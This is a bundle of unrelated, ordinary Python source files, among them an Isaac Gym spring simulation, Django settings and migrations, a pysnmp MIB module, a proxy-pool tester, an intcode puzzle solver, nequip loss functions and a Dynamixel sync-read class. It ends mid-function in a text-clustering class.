connection[1], :] -= torch.squeeze(endpoint_normalized_vector*test2*damping_coff) # print(test2) line_vertices[i*2,:] = force_positions[connection[0],:] line_vertices[i*2+1,:] = force_positions[connection[1],:] line_colors[i,:] = torch.tensor([1.0, 0.0, 0.0]) i += 1 # print('forces') # print(forces) # print('force_positions') # print(force_positions) # if((frame_count % 1000) == 0): # forces[0, 0, :] += torch.tensor([0.0, 0.0, 100.0]) gym.apply_rigid_body_force_at_pos_tensors(sim, gymtorch.unwrap_tensor(forces), gymtorch.unwrap_tensor(force_positions), gymapi.ENV_SPACE) # Draw Lines # print('line_verts') # print(line_vertices) gym.clear_lines(viewer) gym.add_lines(viewer, env0, num_lines, line_vertices, line_colors) frame_count += 1 # step the physics gym.simulate(sim) gym.fetch_results(sim, True) # update the viewer gym.step_graphics(sim) gym.draw_viewer(viewer, sim, True) # Wait for dt to elapse in real time. # This synchronizes the physics simulation with the rendering rate. gym.sync_frame_time(sim) print('Done') gym.destroy_viewer(viewer) gym.destroy_sim(sim)
python
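# A condensed sketch of the tension-only spring-damper force computed in the
# simulation loop above, for a single pair of endpoints. P1/P2 are endpoint
# positions and V1/V2 their linear velocities; k, c and L0 mirror spring_coff,
# damping_coff and the per-connection rest length.
import torch


def spring_damper_force(P1, P2, V1, V2, k=50.0, c=0.999, L0=0.1):
    d = P1 - P2
    dist = torch.norm(d)
    d_hat = d / dist
    # Tension only: no force once the spring is shorter than its rest length.
    tension = torch.clamp(k * (dist - L0), min=0.0)
    # Relative velocity projected onto the spring axis gives the damping term.
    rel_vel = torch.dot(V1 - V2, d_hat)
    # Force on the body at P1; the body at P2 receives the opposite force.
    return -d_hat * tension - d_hat * c * rel_vel


f1 = spring_damper_force(torch.tensor([0.0, 0.0, 0.0]),
                         torch.tensor([0.3, 0.0, 0.0]),
                         torch.zeros(3), torch.zeros(3))
print(f1)  # points from the first endpoint toward the second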
from django.urls import path

from .views import encuesta

urlpatterns = [
    path('', encuesta, name='encuesta'),
]
python
# # PySNMP MIB module REDSTONE-TC (http://snmplabs.com/pysmi) # ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/REDSTONE-TC # Produced by pysmi-0.3.4 at Mon Apr 29 20:46:57 2019 # On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4 # Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) # Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols("ASN1", "Integer", "ObjectIdentifier", "OctetString") NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues") ValueRangeConstraint, SingleValueConstraint, ConstraintsUnion, ConstraintsIntersection, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "SingleValueConstraint", "ConstraintsUnion", "ConstraintsIntersection", "ValueSizeConstraint") rsMgmt, = mibBuilder.importSymbols("REDSTONE-SMI", "rsMgmt") ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup") Counter32, MibIdentifier, Gauge32, ObjectIdentity, TimeTicks, NotificationType, ModuleIdentity, Integer32, MibScalar, MibTable, MibTableRow, MibTableColumn, Counter64, IpAddress, Unsigned32, iso, Bits = mibBuilder.importSymbols("SNMPv2-SMI", "Counter32", "MibIdentifier", "Gauge32", "ObjectIdentity", "TimeTicks", "NotificationType", "ModuleIdentity", "Integer32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Counter64", "IpAddress", "Unsigned32", "iso", "Bits") TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString") rsTextualConventions = ModuleIdentity((1, 3, 6, 1, 4, 1, 2773, 2, 1)) rsTextualConventions.setRevisions(('1998-01-01 00:00',)) if mibBuilder.loadTexts: rsTextualConventions.setLastUpdated('9801010000Z') if mibBuilder.loadTexts: rsTextualConventions.setOrganization('Redstone Communications, Inc.') class RsEnable(TextualConvention, Integer32): status = 'current' subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1)) namedValues = NamedValues(("disable", 0), ("enable", 1)) class RsName(DisplayString): status = 'current' subtypeSpec = DisplayString.subtypeSpec + ValueSizeConstraint(0, 15) class RsNextIfIndex(TextualConvention, Integer32): status = 'current' subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(0, 2147483647) class RsIpAddrLessIf(TextualConvention, IpAddress): status = 'current' class RsTimeSlotMap(TextualConvention, OctetString): status = 'current' subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(4, 4) fixedLength = 4 class RsAcctngAdminType(TextualConvention, Integer32): status = 'current' subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1)) namedValues = NamedValues(("disabled", 0), ("enabled", 1)) class RsAcctngOperType(TextualConvention, Integer32): status = 'current' subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1, 2)) namedValues = NamedValues(("disable", 0), ("enable", 1), ("notSupported", 2)) mibBuilder.exportSymbols("REDSTONE-TC", RsAcctngOperType=RsAcctngOperType, rsTextualConventions=rsTextualConventions, RsAcctngAdminType=RsAcctngAdminType, RsName=RsName, PYSNMP_MODULE_ID=rsTextualConventions, RsEnable=RsEnable, RsIpAddrLessIf=RsIpAddrLessIf, RsNextIfIndex=RsNextIfIndex, RsTimeSlotMap=RsTimeSlotMap)
python
import asyncio import aiohttp import time import sys from aiohttp.client_exceptions import ClientConnectorError try: from aiohttp import ClientError except: from aiohttp import ClientProxyConnectionError as ProxyConnectionError from proxypool.db import RedisClient from proxypool.setting import * class Tester(object): def __init__(self, redis_key): self.redis = RedisClient(redis_key) async def test_single_proxy(self, proxy): """ 测试单个代理 :param proxy: :return: """ conn = aiohttp.TCPConnector(ssl=False) async with aiohttp.ClientSession(connector=conn) as session: try: if isinstance(proxy, bytes): proxy = proxy.decode('utf-8') real_proxy = 'http://' + proxy print('正在测试', proxy) headers = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en;q=0.9,ja;q=0.8,fr;q=0.7', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0', # 'Upgrade-Insecure-Requests': 1, 'Connection': 'close', } async with session.get(TEST_URL, headers=headers, proxy=real_proxy, timeout=TIMEOUT, allow_redirects=False) as response: if response.status in VALID_STATUS_CODES: self.redis.max(proxy) print('代理可用', proxy) else: self.redis.decrease(proxy) print('请求响应码不合法 ', response.status, 'IP', proxy) except (ClientError, ClientConnectorError, asyncio.TimeoutError, AttributeError): self.redis.decrease(proxy) print('代理请求失败', proxy) def run(self): """ 测试主函数 :return: """ print('测试器开始运行') try: count = self.redis.count() print('当前剩余', count, '个代理') for i in range(0, count, BATCH_TEST_SIZE): start = i stop = min(i + BATCH_TEST_SIZE, count) print('正在测试第', start + 1, '-', stop, '个代理') test_proxies = self.redis.batch(start, stop) loop = asyncio.get_event_loop() tasks = [self.test_single_proxy(proxy) for proxy in test_proxies] loop.run_until_complete(asyncio.wait(tasks)) sys.stdout.flush() time.sleep(5) except Exception as e: print('测试器发生错误', e.args) if __name__ == '__main__': tester = Tester() while True: print('测试器开始运行') tester.run() time.sleep(20)
python
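# The Tester above promotes a working proxy to a maximum score (self.redis.max)
# and penalises a failing one (self.redis.decrease). A sketch of that scoring
# pattern directly on a redis-py sorted set; the key name and score limits are
# illustrative, not the pool's real settings.
import redis

r = redis.StrictRedis(host='localhost', port=6379, decode_responses=True)
KEY, MAX_SCORE, MIN_SCORE = 'proxies:test', 100, 0


def mark_ok(proxy):
    r.zadd(KEY, {proxy: MAX_SCORE})


def mark_fail(proxy):
    score = r.zincrby(KEY, -1, proxy)
    if score <= MIN_SCORE:
        r.zrem(KEY, proxy)


mark_ok('127.0.0.1:8888')
print(r.zscore(KEY, '127.0.0.1:8888'))  # 100.0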
import sys
sys.path.append("..")

import cv2

from CORE.streamServerDependency.camera import Camera

c = Camera()
cv2.namedWindow("test")

while True:
    cv2.imshow("test", c.image)
    cv2.waitKey(1)
python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import models, migrations
import image_cropping.fields


class Migration(migrations.Migration):

    dependencies = [
        ('artwork', '0006_auto_20151010_2243'),
    ]

    operations = [
        migrations.AlterField(
            model_name='artwork',
            name='thumbnail',
            field=image_cropping.fields.ImageRatioField('image', '640x400', hide_image_field=False, adapt_rotation=False, size_warning=True, verbose_name='thumbnail', help_text=None, allow_fullsize=False, free_crop=False),
        ),
    ]
python
import image2ascii.boot
import image2ascii.lib
import argparse


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('-f', '--filename', required=True, type=str)
    parser.add_argument('-W', '--width', type=int)
    parser.add_argument('-H', '--height', type=int)
    parser.add_argument('-greysave', action='store_true')
    parser.add_argument('-colorsave', action='store_true')
    args = parser.parse_args()

    image2ascii.boot.BootScreen()
    image2ascii.lib.Create(
        filename=args.filename,
        width=args.width,
        height=args.height,
        greySave=args.greysave,
        colorSave=args.colorsave
    )


if __name__ == '__main__':
    main()
    print()
python
import itertools from intcode import Computer def run(data): code = [int(c) for c in data.split(',')] return find_max_thrust(code)[-1], find_max_thrust_feedback(code)[-1] def find_max_thrust(code): max_thrust = 0 for phases in itertools.permutations(range(5), 5): val = 0 for phase in phases: c = Computer(code) c.run([phase, val]) val = c.output[0] if c.output[0] > max_thrust: max_thrust = c.output[0] best = phases return best, max_thrust def find_max_thrust_feedback(code): max_thrust = 0 for phases in itertools.permutations(range(5, 10), 5): amps = [Computer(code, id=i) for i in range(5)] for i, (phase, amp) in enumerate(zip(phases, amps)): amps[i-1].connect_sink(amp) amp.send_input([phase]) amps[0].send_input([0]) while any(amp.running for amp in amps): for amp in amps: amp.run() if amps[-1].output[0] > max_thrust: max_thrust = amps[-1].output[0] best = phases return best, max_thrust if __name__ == '__main__': from aocd.models import Puzzle assert find_max_thrust([3,15,3,16,1002,16,10,16,1,16,15,15,4,15,99,0,0]) == ((4, 3, 2, 1, 0), 43210) assert (find_max_thrust([3,23,3,24,1002,24,10,24,1002,23,-1,23,101,5,23,23,1,24,23,23,4,23,99,0,0]) == ((0, 1, 2, 3, 4), 54321)) assert (find_max_thrust([3,31,3,32,1002,32,10,32,1001,31,-2,31,1007,31,0,33,1002,33,7,33,1,33,31,31,1,32,31,31,4,31,99,0,0,0]) == ((1, 0, 4, 3, 2), 65210)) assert (find_max_thrust_feedback([3,26,1001,26,-4,26,3,27,1002,27,2,27,1,27,26,27,4,27,1001,28,-1,28,1005,28,6,99,0,0,5]) == ((9, 8, 7, 6, 5), 139629729)) assert (find_max_thrust_feedback([3,52,1001,52,-5,52,3,53,1,52,56,54,1007,54,5,55,1005,55,26,1001,54, -5,54,1105,1,12,1,53,54,53,1008,54,0,55,1001,55,1,55,2,53,55,53,4, 53,1001,56,-1,56,1005,56,6,99,0,0,0,0,10]) == ((9, 7, 8, 5, 6), 18216)) puz = Puzzle(2019, 7) part_a, part_b = run(puz.input_data) puz.answer_a = part_a print(f'Part 1: {puz.answer_a}') puz.answer_b = part_b print(f'Part 2: {puz.answer_b}')
python
''' Development Test Module '''
# import os
import argparse

from dotenv import load_dotenv

# from pyspreader.client import SpreadClient, MSSQLSpreadClient
from pyspreader.worker import SpreadWorker

load_dotenv(verbose=True)

if __name__ == '__main__':
    # cli = MSSQLSpreadClient(connection_string=os.environ.get('SPREADER_LIVE_DSN'), debug=True)
    # cli.agent_name = 'Test Agent'
    # agentid = cli.connect()
    # print('Current Agent ID is', agentid)

    parser = argparse.ArgumentParser(prefix_chars='/')
    parser.add_argument('/id', required=True)
    xargs = parser.parse_args()

    print('*******************************')

    worker = SpreadWorker(debug=True, id=xargs.id)
    print('SpreadWorker: ', worker)

    print('Starting...')
    worker.start()

    print('Waiting for Client to close process...')
    worker.wait_for_worker_close()

    print('Finished')
python
""" Django settings for ac_mediator project. Generated by 'django-admin startproject' using Django 1.10.2. For more information on this file, see https://docs.djangoproject.com/en/1.10/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.10/ref/settings/ """ import os import dj_database_url import raven # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = os.getenv('DJANGO_SECRET_KEY', 'default_secret_key') # Debug, allowed hosts and database if os.getenv('DEPLOY_ENV', 'dev') == 'prod': if SECRET_KEY == 'default_secret_key': print("Please configure your secret key by setting DJANGO_SECRET_KEY environment variable") DEBUG = False ALLOWED_HOSTS = ['localhost', 'asplab-web1', 'm.audiocommons.org', 'asplab-web1.s.upf.edu', 'docker.sb.upf.edu'] else: DEBUG = True DATABASE_URL_ENV_NAME = 'DJANGO_DATABASE_URL' DATABASES = {'default': dj_database_url.config( DATABASE_URL_ENV_NAME, default='postgres://postgres:postgres@db/ac_mediator')} # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'django_extensions', 'accounts', 'api', 'rest_framework', 'oauth2_provider', 'developers', 'services', 'docs', 'raven.contrib.django.raven_compat', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'ac_mediator.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [os.path.join(BASE_DIR, 'templates')], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'ac_mediator.wsgi.application' # Password validation # https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/1.10/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'Europe/Madrid' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.10/howto/static-files/ STATIC_URL = '/static/' STATICFILES_DIRS = [os.path.join(BASE_DIR, "static")] STATIC_ROOT = '/static/' # API settings ALLOW_UNAUTHENTICATED_API_REQUESTS_ON_DEBUG = True REST_FRAMEWORK = { 'DEFAULT_RENDERER_CLASSES': ('rest_framework.renderers.JSONRenderer',), 'DEFAULT_AUTHENTICATION_CLASSES': ( 
'oauth2_provider.ext.rest_framework.OAuth2Authentication', ), 'DEFAULT_PERMISSION_CLASSES': ( 'rest_framework.permissions.IsAuthenticated' if not DEBUG or not ALLOW_UNAUTHENTICATED_API_REQUESTS_ON_DEBUG else 'rest_framework.permissions.AllowAny', ), 'EXCEPTION_HANDLER': 'api.utils.custom_exception_handler', 'URL_FORMAT_OVERRIDE': None, # disable DRF use of 'format' parameter (we have our own) } OAUTH2_PROVIDER_APPLICATION_MODEL = 'api.ApiClient' OAUTH2_PROVIDER = { 'ACCESS_TOKEN_EXPIRE_SECONDS': 60*60*24, # 1 day 'REFRESH_TOKEN_EXPIRE_SECONDS': 60*60*15, # 2 weeks 'AUTHORIZATION_CODE_EXPIRE_SECONDS': 10*60, # 10 minutes 'SCOPES': {'read': 'Read scope'}, 'OAUTH2_VALIDATOR_CLASS': 'api.utils.ACOAuth2Validator', } JSON_LD_FORMAT_KEY = 'jsonld' JSON_FORMAT_KEY = 'json' DEFAULT_RESPONSE_FORMAT = JSON_FORMAT_KEY # Registration AUTH_USER_MODEL = 'accounts.Account' LOGIN_URL = '/login/' LOGOUT_URL = '/' LOGIN_REDIRECT_URL = '/' # Site BASE_URL = os.getenv('DJANGO_BASE_URL', 'http://example.com') # Documentation DOCS_ROOT = os.path.join(BASE_DIR, 'docs/_build/html') DOCS_ACCESS = 'public' # Redis REDIS_HOST = 'redis' # Host where redis is running (we use docker alias here) REDIS_PORT = 6379 # Celery CELERY_BROKER_URL = "redis://redis" CELERY_RESULT_BACKEND = "redis://redis" CELERY_ACCEPT_CONTENT = ['json'] CELERY_TIMEZONE = 'Europe/Madrid' # Set this to False so that requests are submitted sequentially and from the webserver when in DEBUG mode instead of # in parallel and using Celery. This can be useful so that Celery workers don't need to be restarted when making # changes to the code USE_CELERY_IN_DEBUG_MODE = False # Shared respones backend and async responses DELETE_RESPONSES_AFTER_CONSUMED = False RESPONSE_EXPIRY_TIME = 3600*24 # Response objects are deleted after 24 hours RAVEN_CONFIG = { 'dsn': os.getenv('SENTRY_DSN', None), } # Email configuration DEFAULT_FROM_EMAIL = 'Audio Commons <[email protected]>' EMAIL_SUBJECT_PREFIX = '[AudioCommons] ' EMAIL_HOST = 'smtp-rec.upf.edu' EMAIL_PORT = 25 if DEBUG: # In development environment, use email file backend EMAIL_BACKEND = 'django.core.mail.backends.filebased.EmailBackend' EMAIL_FILE_PATH = os.path.join(BASE_DIR, "mail") # Logging LOGGING = { 'version': 1, 'disable_existing_loggers': False, 'formatters': { 'simple': { 'format': '%(levelname)s %(message)s' }, 'simplest': { 'format': '%(message)s' }, }, 'filters': { 'require_debug_true': { '()': 'django.utils.log.RequireDebugTrue', }, }, 'handlers': { 'stdout': { 'level': 'INFO', 'filters': ['require_debug_true'], 'class': 'logging.StreamHandler', 'formatter': 'simple', }, 'gelf': { 'class': 'logging.NullHandler', # This will be redefined later if configuration is provided }, }, 'loggers': { 'management': { 'handlers': ['stdout', 'gelf'], 'level': 'INFO', 'propagate': False, }, }, } if DEBUG: # In development we log all requests made into a file LOGS_BASE_DIR = os.path.join(BASE_DIR, 'logs') if not os.path.exists(LOGS_BASE_DIR): os.makedirs(LOGS_BASE_DIR) LOGGING['handlers'].update({ 'logfile_requests': { 'class': 'logging.FileHandler', 'filename': os.path.join(LOGS_BASE_DIR, 'requests.log'), 'formatter': 'simplest' } }) LOGGING['loggers'].update({ 'requests_sent': { 'handlers': ['logfile_requests'], 'level': 'INFO', 'propagate': False, } }) # Read logserver config settings, if present, then update the corresponding handler GELF_IP_ADDRESS = os.getenv('GELF_IP_ADDRESS', None) GELF_PORT = int(os.getenv('GELF_PORT', 0)) if GELF_IP_ADDRESS is not None and GELF_PORT is not None: 
LOGGING['handlers'].update( { 'gelf': { 'level': 'INFO', 'class': 'graypy.GELFHandler', 'host': GELF_IP_ADDRESS, 'port': GELF_PORT, 'formatter': 'simple', }, } )
python
import time import aiohttp import asyncio import statistics runs = [] async def fetch(session, url): async with session.get(url) as response: return await response.text() async def main(loop): for i in range(3): latencies = [] expected_response = ','.join(['OK']*100) async def iterate(): nonlocal latencies start = time.time() async with aiohttp.ClientSession() as session: response = await fetch(session, 'http://localhost:1995') try: assert response == expected_response except AssertionError as e: print(e) latencies.append(time.time() - start) coroutines = [asyncio.create_task(iterate()) for _ in range(100)] await asyncio.gather(*coroutines) runs.append((statistics.mean(latencies), statistics.stdev(latencies), max(latencies))) loop = asyncio.get_event_loop() loop.run_until_complete(main(loop)) print(f"Mean Latency: {statistics.mean([run[0] for run in runs])}, Standard Deviation: {statistics.mean([run[1] for run in runs])}, Max Latency: {statistics.mean([run[2] for run in runs])}")
python
import logging import torch.nn from torch_scatter import scatter from nequip.data import AtomicDataDict from nequip.utils import instantiate_from_cls_name class SimpleLoss: """wrapper to compute weighted loss function if atomic_weight_on is True, the loss function will search for AtomicDataDict.WEIGHTS_KEY+key in the reference data. Args: func_name (str): any loss function defined in torch.nn that takes "reduction=none" as init argument, uses prediction tensor, and reference tensor for its call functions, and outputs a vector with the same shape as pred/ref params (str): arguments needed to initialize the function above """ def __init__(self, func_name: str, params: dict = {}): func, _ = instantiate_from_cls_name( torch.nn, class_name=func_name, prefix="", positional_args=dict(reduction="none"), optional_args=params, all_args={}, ) self.func = func def __call__( self, pred: dict, ref: dict, key: str, atomic_weight_on: bool = False, mean: bool = True, ): loss = self.func(pred[key], ref[key]) weights_key = AtomicDataDict.WEIGHTS_KEY + key if weights_key in ref and atomic_weight_on: weights = ref[weights_key] # TO DO if mean: return (loss * weights).mean() / weights.mean() else: raise NotImplementedError( "metrics and running stat needs to be compatible with this" ) return loss * weights, weights else: if mean: return loss.mean() else: return loss return loss class PerSpeciesLoss(SimpleLoss): """Compute loss for each species and average among the same species before summing them up. Args same as SimpleLoss """ def __call__( self, pred: dict, ref: dict, key: str, atomic_weight_on: bool = False, mean: bool = True, ): if not mean: raise NotImplementedError("cannot handle this yet") per_atom_loss = self.func(pred[key], ref[key]) per_atom_loss = per_atom_loss.mean(dim=-1, keepdim=True) # if there is atomic weights weights_key = AtomicDataDict.WEIGHTS_KEY + key if weights_key in ref and atomic_weight_on: weights = ref[weights_key] per_atom_loss = per_atom_loss * weights else: atomic_weight_on = False species_index = pred[AtomicDataDict.SPECIES_INDEX_KEY] _, inverse_species_index = torch.unique(species_index, return_inverse=True) if atomic_weight_on: # TO DO per_species_weight = scatter(weights, inverse_species_index, dim=0) per_species_loss = scatter(per_atom_loss, inverse_species_index, dim=0) return (per_species_loss / per_species_weight).mean() else: return scatter( per_atom_loss, inverse_species_index, reduce="mean", dim=0 ).mean() def find_loss_function(name: str, params): wrapper_list = dict( PerSpecies=PerSpeciesLoss, ) if isinstance(name, str): for key in wrapper_list: if name.startswith(key): logging.debug(f"create loss instance {wrapper_list[key]}") return wrapper_list[key](name[len(key) :], params) return SimpleLoss(name, params) elif callable(name): return name else: raise NotImplementedError(f"{name} Loss is not implemented")
python
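# SimpleLoss above instantiates the named torch.nn loss with reduction="none"
# and applies its own reduction. A pure-torch sketch of that behaviour for
# "MSELoss" on a made-up "forces" key, without importing nequip.
import torch

pred = {"forces": torch.randn(5, 3)}
ref = {"forces": torch.randn(5, 3)}

per_element = torch.nn.MSELoss(reduction="none")(pred["forces"], ref["forces"])
print(per_element.shape)   # same shape as the inputs: torch.Size([5, 3])
print(per_element.mean())  # what SimpleLoss returns with mean=True and no atomic weights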
#!/usr/bin/env python # -*- coding: utf-8 -*- ################################################################################ # Copyright 2017 ROBOTIS CO., LTD. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ################################################################################ # Author: Ryu Woon Jung (Leon) from .robotis_def import * class GroupSyncRead: def __init__(self, port, ph, start_address, data_length): self.port = port self.ph = ph self.start_address = start_address self.data_length = data_length self.last_result = False self.is_param_changed = False self.param = [] self.data_dict = {} self.clearParam() def makeParam(self): if self.ph.getProtocolVersion() == 1.0: return if not self.data_dict: # len(self.data_dict.keys()) == 0: return self.param = [] for dxl_id in self.data_dict: self.param.append(dxl_id) def addParam(self, dxl_id): if self.ph.getProtocolVersion() == 1.0: return False if dxl_id in self.data_dict: # dxl_id already exist return False self.data_dict[dxl_id] = [] # [0] * self.data_length self.is_param_changed = True return True def removeParam(self, dxl_id): if self.ph.getProtocolVersion() == 1.0: return if dxl_id not in self.data_dict: # NOT exist return del self.data_dict[dxl_id] self.is_param_changed = True def clearParam(self): if self.ph.getProtocolVersion() == 1.0: return self.data_dict.clear() def txPacket(self): if self.ph.getProtocolVersion() == 1.0 or len(self.data_dict.keys()) == 0: return COMM_NOT_AVAILABLE if self.is_param_changed is True or not self.param: self.makeParam() return self.ph.syncReadTx(self.port, self.start_address, self.data_length, self.param, len(self.data_dict.keys()) * 1) def rxPacket(self): self.last_result = False if self.ph.getProtocolVersion() == 1.0: return COMM_NOT_AVAILABLE result = COMM_RX_FAIL if len(self.data_dict.keys()) == 0: return COMM_NOT_AVAILABLE for dxl_id in self.data_dict: self.data_dict[dxl_id], result, _ = self.ph.readRx(self.port, dxl_id, self.data_length) if result != COMM_SUCCESS: return result if result == COMM_SUCCESS: self.last_result = True return result def txRxPacket(self): if self.ph.getProtocolVersion() == 1.0: return COMM_NOT_AVAILABLE result = self.txPacket() if result != COMM_SUCCESS: return result return self.rxPacket() def isAvailable(self, dxl_id, address, data_length): if self.ph.getProtocolVersion() == 1.0 or self.last_result is False or dxl_id not in self.data_dict: return False if (address < self.start_address) or (self.start_address + self.data_length - data_length < address): return False return True def getData(self, dxl_id, address, data_length): if not self.isAvailable(dxl_id, address, data_length): return 0 if data_length == 1: return self.data_dict[dxl_id][address - self.start_address] elif data_length == 2: return DXL_MAKEWORD(self.data_dict[dxl_id][address - self.start_address], self.data_dict[dxl_id][address - self.start_address + 1]) elif data_length == 4: return DXL_MAKEDWORD(DXL_MAKEWORD(self.data_dict[dxl_id][address - self.start_address + 0], self.data_dict[dxl_id][address - 
self.start_address + 1]), DXL_MAKEWORD(self.data_dict[dxl_id][address - self.start_address + 2], self.data_dict[dxl_id][address - self.start_address + 3])) else: return 0
python
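# A usage sketch for GroupSyncRead above, following the usual dynamixel_sdk
# pattern. The port name, baud rate, servo IDs and the present-position
# address/length (132, 4 bytes as on X-series servos) are assumptions for
# illustration only.
from dynamixel_sdk import PortHandler, PacketHandler, GroupSyncRead, COMM_SUCCESS

ADDR_PRESENT_POSITION, LEN_PRESENT_POSITION = 132, 4

port = PortHandler('/dev/ttyUSB0')
packet = PacketHandler(2.0)
port.openPort()
port.setBaudRate(57600)

sync_read = GroupSyncRead(port, packet, ADDR_PRESENT_POSITION, LEN_PRESENT_POSITION)
for dxl_id in (1, 2):
    sync_read.addParam(dxl_id)

if sync_read.txRxPacket() == COMM_SUCCESS:
    for dxl_id in (1, 2):
        if sync_read.isAvailable(dxl_id, ADDR_PRESENT_POSITION, LEN_PRESENT_POSITION):
            print(dxl_id, sync_read.getData(dxl_id, ADDR_PRESENT_POSITION, LEN_PRESENT_POSITION))

port.closePort()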
import pandas as pd import S3Api from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer, ENGLISH_STOP_WORDS from sklearn.cluster import KMeans import matplotlib.pyplot as plt from sklearn import metrics from sklearn.decomposition import PCA import numpy as np import plotly.express as px from sklearn import preprocessing from sklearn.cluster import AgglomerativeClustering import plotly.figure_factory as ff from sklearn.cluster import DBSCAN import os import glob import codecs STORE_DATA = True class CustomSearchClustering: def __init__(self, file_storage, s3_api): """ Create a new instance of the CustomSearchData class Parameters ---------- :param file_storage: FileStorage, Required The file storage class used to store raw/processed data :param s3_api: S3_API, Required The S3 api wrapper class used to store data in AWS S3 ---------- """ self._file_storage = file_storage self._s3_api = s3_api self.__processed_data_location = 'processed_data/search_results/cleaned_search_data.csv' self.__processed_pdf_data_location = '/Users/sampastoriza/Documents/Programming/DataScienceDevelopment/DataSciencePortfolioCode/PandemicComparison/processed_data/corpus_data/cleaned_corpus_data.csv' self.__clustered_visualizations_location = 'clustered_data_visualizations/search_results' self.__clustered_data_location = 'clustered_data/search_results' self._additional_stop_words = ['title', 'journal', 'volume', 'author', 'scholar', 'article', 'issue'] self._other_k_values = [3, 4, 6, 8, 10] def cluster_search_data(self): self.__clean_clustered_visualizations() processed_df = pd.read_csv(self.__processed_data_location, index_col=False) processed_pdf_df = pd.read_csv(self.__processed_pdf_data_location, index_col=False) processed_df = pd.concat([processed_df, processed_pdf_df], ignore_index=True) processed_df.to_csv('processed_data/search_results/combined_search_data.csv', index=False) print(processed_df.head()) stop_words = ENGLISH_STOP_WORDS.union(self._additional_stop_words) print('----------------------------------') print('Trying count vectorizer...') print('----------------------------------') vectorizer = CountVectorizer(stop_words=stop_words) self.__cluster_using_vectorizer(processed_df, vectorizer, 'count') print('----------------------------------') print('Trying td vectorizer...') print('----------------------------------') vectorizer = TfidfVectorizer(stop_words=stop_words) self.__cluster_using_vectorizer(processed_df, vectorizer, 'tfidf') def __clean_clustered_visualizations(self): all_files = list(glob.iglob(f'{self.__clustered_visualizations_location}/**/*.html', recursive=True)) + \ list(glob.iglob(f'{self.__clustered_visualizations_location}/**/*.png', recursive=True)) print('Remove all files in the directory', all_files) for f in all_files: os.remove(f) def __cluster_using_vectorizer(self, df, vectorizer, vectorizer_type): normalized_label = f'normalized_{vectorizer_type}' not_normalized_label = f'not_{normalized_label}' v = vectorizer.fit_transform(df['text']) vocab = vectorizer.get_feature_names() values = v.toarray() v_df = pd.DataFrame(values, columns=vocab) print('----------------------------------') print('Non normalized data') print('----------------------------------') df_not_normalized = pd.DataFrame(v_df) self.__cluster(df_not_normalized, df, not_normalized_label, 'Not Normalized', vectorizer_type) pca_analysis_results_nn = self.__run_pca_analysis(df_not_normalized, df) df['PC0_NN'] = pca_analysis_results_nn['PC0'] df['PC1_NN'] = pca_analysis_results_nn['PC1'] 
